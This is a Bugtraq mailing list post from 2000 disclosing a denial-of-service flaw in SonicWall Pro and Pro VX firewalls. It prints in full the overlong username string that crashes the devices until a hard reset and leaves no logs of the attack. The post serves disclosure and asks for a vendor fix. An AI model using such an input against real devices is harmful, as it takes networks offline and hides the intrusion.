Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[no subject]

From: arieleis () COOLMAIL NET
Date: Fri, 1 Dec 2000 10:36:34 -0500
All,    
        After reading a report on security focus that deals with the sonicwall soho versions 4.0 and 5.0 being 
vulnerable to a buffer overflow by using a alot of characters in the username...I started testing againg our Sonicwall 
Pro and Pro VX in the lab.

Entering this for the username   -


092843lb4b2j34lh324jklh321j4h23jh4h32lh4kh23jh4k32l4h1;32uo439028470923874823709479283740872319874872314-072319748-73214y321h4jh32;j4y;239847802134u32h4p923u432ij4iop832u4i32j4kj234jk32j4j2o3ij4;123o4juio23j4io2j314ioj231oij4i23h4ih32;i4hji;o234;io2j34;oijio;23j4;32i4h;i23h4;io3h2i;o4h;o234;io23j4i;o23j4;j32;4j;32j4;j3124;j23;i4j;2o3i4j;231h54;ioh213;o5i23;ioh54;o2i1hi2o345;oij145;oij23;o54;2o31jh45io;2j315;io243j;1i5o32;oh54;io23h145;i2154i1o2j435hi2143h5;h432;5ih143;5jh;4135hj;143j5;i15ji4o;jh1;ih54o;i5jh3o;i5jhio15jhi431h5i;o34h5;ioh4i;o5hi;4oh3;io54h;i4o1h5i;o143h5;io13;o5hj1io;4h5io;14hj5i;o1h;io4h5;oi1h5i;oh1345io;h43;oi5h4i;o1;5iohi;o435h;io134h5;1oj4;io13h;1h4;oi54;io231;io52;oi345;oi234;o51;ioj5r;j134i;o51;iohio4i;o;3o21oi5;io145hi43;oi5;43o5;4o35;34o5;o435;43hj5;o43h5;o435;ioh43oh5;43oi5j;oi4jh5;oij45;oj435;oj435;ioj435;oij435;oij345;oij34;o5ij43;oi5j4;3o5;345jio345oiuj43j5;43oj5;io435oij43oj54;3oj5;oij435;oi435;oi43o;5;io435;io3j45;oj34;5ioj;34oj5;o345j;o34o5j432o5i!
o234;oi5;oi435;o32uj4;5oiu4;oi;uj543u25u4;3o5;i345io;o435io34;5u;54;o2i3u45;i53;3i5u;i4325u2;3u534;25u32;o4iu5;324u5;i32ou5;io245u;342u5;23iou5;43o5iu345;234ou5234;o5iu2;34oi5u23;io5u23;ou45;34oui523;iou34;iou45;23iou4;2oi5u43;5iou243;o5iu32;4oui5;32ou45oi2u435;oi23u4j5;o243j5;o2ju435j345;j43;5;43j53;4jr;ifg;fjkfjklgfjkgfjk;lkj;lgfljklfkjgjkl;gjkl;gjkl;gjklgjklgjksfdjkgfjkl;g;jlgjklgfjkl;gj;lgfj;klgjkl;gjklfjklggklsjk;sk;jlsjkl;gjklfjkl;sl;jkjk;lgjkl;sgjgldljkgdjlk;fjl;gjkl;ldjsjlk;gsjl;kgjlksgjlkgsjlk;d;jlkdjkl;sflsgfjklgskjsgjkl;gslkjgsl;jklsgfdl;gjlfdlgk;jd;slfj;lkgsl;dfg;kjlsdfgkjsfjd;lgjsdjfgjsd';jgkjs;kfdgkjsd;fgj;sdf;jd;sjg;jdfgkjsd;fjgk;sj;sdljfjgk;sfjd;jgsd;fjgjsdgj;sldfj;gj;sdfjgj;sjfdjg;sdfjgjs;dfjg;ksdfjkgjsj;ksl;klj;lfdjgk;jfd;lgdfg

and using this for the password-

blah

The sonicwalls pro and pro vx not only stopped allowing communication....but lost everything all together....they did 
not automatically reset....they did not automatically stop the log in......they were down until we physically reset 
them. This is a different issue then the prior reported because it actually stops communication for good until a hard 
reset.

Upon a reset I logged back into the box and guess what......NO LOGS AT ALL PERTAINING TO THE ATTACK!  This is no 
good...we need a firmware fix immediately.


mod7

digital llamas


____________________________________________
CoolMail(tm).  Hear.  There.  Everywhere.(sm)
E-mail by phone - http://www.planetarymotion.com
Previous By Date Next
Previous By Thread Next

Current thread: